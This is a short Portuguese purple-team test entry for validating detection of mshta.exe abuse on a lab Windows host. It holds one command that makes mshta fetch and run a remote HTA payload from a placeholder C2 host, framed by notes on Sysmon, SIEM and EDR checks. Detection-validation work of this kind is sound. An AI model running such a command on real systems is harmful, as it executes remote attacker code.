mshta.exe test
mshta.exe http://<c2>/payload.hta
Executa um payload HTA com mshta no host de teste, validando a detecção do abuso do binário legítimo para executar código.
Execute-o no laboratório de purple team quando quiser validar a detecção da execução por mshta: o comando executa o HTA remoto (o binário legítimo do Windows usado por atores para executar código) e a equipe verifica o que foi detectado — Sysmon Event 1 (mshta com a URL), as regras do SIEM (mshta executando HTA remoto), o EDR. É a validação do living off the land na execução: o binário legítimo que as assinaturas não veem. No purple teaming, mshta valida a camada de comportamento da execução de HTA.
Não o execute fora do laboratório: a execução do HTA gera a atividade real — o host de teste é o local. E atenção: mshta está obsoleto no Windows 11 (foi removido nas versões recentes): a validação cobre ambientes legados; nos modernos, o atômico falha (a ferramenta não existe) — a variante equivalente é validada separadamente. A detecção baseia-se nos argumentos (mshta com a URL remota) e no contexto; a validação mede essas camadas. A limpeza do HTA baixado ao terminar.